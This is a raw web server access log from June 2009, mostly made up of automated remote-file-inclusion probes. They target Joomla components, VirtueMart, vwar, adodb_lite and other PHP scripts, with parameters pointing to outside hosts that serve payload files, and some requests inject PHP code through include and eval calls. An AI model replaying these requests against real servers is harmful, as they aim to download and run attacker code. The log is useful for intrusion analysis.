70.85.165.10 - - [08/Jun/2009:00:18:50 -0400] "GET /logs/access_log.Q109051800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:19:28 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:19:28 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:19:28 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:19:50 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:19:50 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:00:20:47 -0400] "GET /logs/access_log.Q109052200%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
75.145.152.113 - - [08/Jun/2009:00:20:49 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.145.152.113 - - [08/Jun/2009:00:20:49 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:00:21:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.165.10 - - [08/Jun/2009:00:21:40 -0400] "GET /logs/access_log.Q109051800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
110.45.145.92 - - [08/Jun/2009:00:21:43 -0400] "GET /errors.php?error=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
110.45.145.92 - - [08/Jun/2009:00:21:43 -0400] "GET /logs/errors.php?error=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
110.45.145.92 - - [08/Jun/2009:00:21:43 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:21:53 -0400] "GET /logs/access_log.Q109052400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:21:54 -0400] "GET /logs/access_log.Q109052600%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:22:26 -0400] "GET /logs//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:22:26 -0400] "GET //include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:22:26 -0400] "GET /logs/access_log.Q109052200%20%20//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:00:22:32 -0400] "GET /logs/access_log.Q109051100%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:23:12 -0400] "GET /logs/access_log.Q109050900%20%20//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:23:33 -0400] "GET /apps/apps.php?app=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:23:33 -0400] "GET /logs/apps/apps.php?app=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:23:33 -0400] "GET /logs/access_log.Q109051100%20%20/apps/apps.php?app=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:25:02 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:25:02 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:25:02 -0400] "GET /logs/access_log.Q109052800%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:25:05 -0400] "GET /logs/access_log.Q109051100/apps/apps.php?app=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:00:26:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.185.28.194 - - [08/Jun/2009:00:26:35 -0400] "GET /logs/error_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:26:50 -0400] "GET /logs/access_log.Q109052800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:27:08 -0400] "GET /logs/access_log.Q109051800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:27:10 -0400] "GET /logs/access_log.Q109052400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:27:27 -0400] "GET /logs/access_log.Q109052400//trans/trans.php?trans=&p=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:00:27:41 -0400] "GET /logs/errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:00:27:41 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:00:27:43 -0400] "GET /errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:28:07 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:00:28:14 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:28:15 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:28:15 -0400] "GET /logs/access_log.Q109052400//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:28:15 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:28:27 -0400] "GET /logs/access_log.Q109052400//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:28:27 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:28:27 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:28:30 -0400] "GET /logs/access_log.Q109052500//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
116.36.213.166 - - [08/Jun/2009:00:28:34 -0400] "GET //include/footer.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:28:34 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:28:35 -0400] "GET /logs/access_log.Q109051100%20%20//include/footer.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:28:36 -0400] "GET //include/footer.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:28:36 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:28:36 -0400] "GET /logs/access_log.Q109051100%20%20//include/footer.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:28:40 -0400] "GET /logs/access_log.Q109052500//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.140.23.185 - - [08/Jun/2009:00:28:40 -0400] "GET /logs/access_log.Q109053100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:29:08 -0400] "GET /errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:29:08 -0400] "GET /logs/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:29:08 -0400] "GET /logs/access_log.Q109050900/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:30:01 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:00:30:02 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:00:30:02 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:00:30:02 -0400] "GET //skin/zero_vote/error.php?dir=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
119.93.90.155 - - [08/Jun/2009:00:30:37 -0400] "GET /logs/access_log.Q109050700%20%20/errors.php?error=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
119.93.90.155 - - [08/Jun/2009:00:30:49 -0400] "GET /logs/access_log.Q109050700%20%20/errors.php?error=http://jungkyung.hs.kr/skin_shop/standard//fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:00:30:57 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:00:30:59 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:00:31:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.110.57.130 - - [08/Jun/2009:00:31:13 -0400] "GET /logs/access_log.Q109053100%20%20/errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:31:31 -0400] "GET /logs/access_log.Q109053000%20%20//include/footer.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:31:37 -0400] "GET /logs/access_log.Q109053000%20%20//include/footer.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:00:32:27 -0400] "GET /logs/access_log.Q109010800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.34.181.87 - - [08/Jun/2009:00:32:31 -0400] "GET /logs/access_log.Q109052200%20%20/!rfi%20administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:33:16 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:33:16 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:33:16 -0400] "GET /logs/access_log.Q109052700//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:33:35 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:33:35 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:33:35 -0400] "GET /logs/access_log.Q109052700//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.34.181.87 - - [08/Jun/2009:00:33:41 -0400] "GET /logs/access_log.Q109051100%20%20/!rfi%20administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:00:33:48 -0400] "GET /logs/access_log.Q108112300%20%20//skin/zero_vote/error.php?dir=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.173.252.182 - - [08/Jun/2009:00:34:11 -0400] "GET / HTTP/1.1" 200 409 "-" "-"
218.246.20.221 - - [08/Jun/2009:00:34:19 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
80.245.60.130 - - [08/Jun/2009:00:34:27 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard/2_view_body/xbot? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
76.164.212.18 - - [08/Jun/2009:00:34:59 -0400] "GET //admin/classes/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:34:59 -0400] "GET /logs//admin/classes/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:34:59 -0400] "GET /logs/access_log.Q109050700//admin/classes/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.145.92 - - [08/Jun/2009:00:35:53 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
110.45.145.92 - - [08/Jun/2009:00:35:53 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.249.71.14 - - [08/Jun/2009:00:36:05 -0400] "GET /logs/error_log.Q108060700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [08/Jun/2009:00:36:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.145.92 - - [08/Jun/2009:00:36:10 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:36:23 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:36:45 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:00:36:55 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:00:36:55 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:00:36:55 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:00:36:55 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:37:01 -0400] "GET //admin/classes/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:37:01 -0400] "GET /logs//admin/classes/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:37:01 -0400] "GET /logs/access_log.Q109050700//admin/classes/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.246.20.221 - - [08/Jun/2009:00:37:14 -0400] "GET /logs/errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.246.20.221 - - [08/Jun/2009:00:37:14 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.246.20.221 - - [08/Jun/2009:00:37:16 -0400] "GET /errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:37:26 -0400] "GET /logs/error_log.Q109051200//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:37:45 -0400] "GET /logs/error_log.Q109051200//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.184.52.8 - - [08/Jun/2009:00:38:55 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:00:38:55 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:39:34 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 4639 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:39:34 -0400] "GET //?path%5Bdocroot%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:39:34 -0400] "GET /logs/access_log.Q109051000%20%20//?path%5Bdocroot%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:00:40:35 -0400] "GET /images/tools/LCALEN.HTM HTTP/1.0" 200 7943 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
76.164.212.18 - - [08/Jun/2009:00:40:36 -0400] "GET /logs/access_log.Q109052600%20%20//?path%5Bdocroot%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:00:41:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.245.60.130 - - [08/Jun/2009:00:41:18 -0400] "GET /errors.php?error=http://jungkyung.hs.kr/skin_shop/standard/2_view_body/xbot? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
203.22.204.193 - - [08/Jun/2009:00:42:05 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:43:10 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:43:11 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:43:12 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
123.24.171.57 - - [08/Jun/2009:00:43:22 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
123.24.171.57 - - [08/Jun/2009:00:43:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
123.24.171.57 - - [08/Jun/2009:00:43:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
123.24.171.57 - - [08/Jun/2009:00:43:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
212.203.95.235 - - [08/Jun/2009:00:43:48 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
74.6.22.170 - - [08/Jun/2009:00:43:55 -0400] "GET /logs/access_log.Q108090300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
110.45.145.92 - - [08/Jun/2009:00:44:11 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.145.92 - - [08/Jun/2009:00:44:11 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.145.92 - - [08/Jun/2009:00:44:11 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
222.255.200.107 - - [08/Jun/2009:00:44:22 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
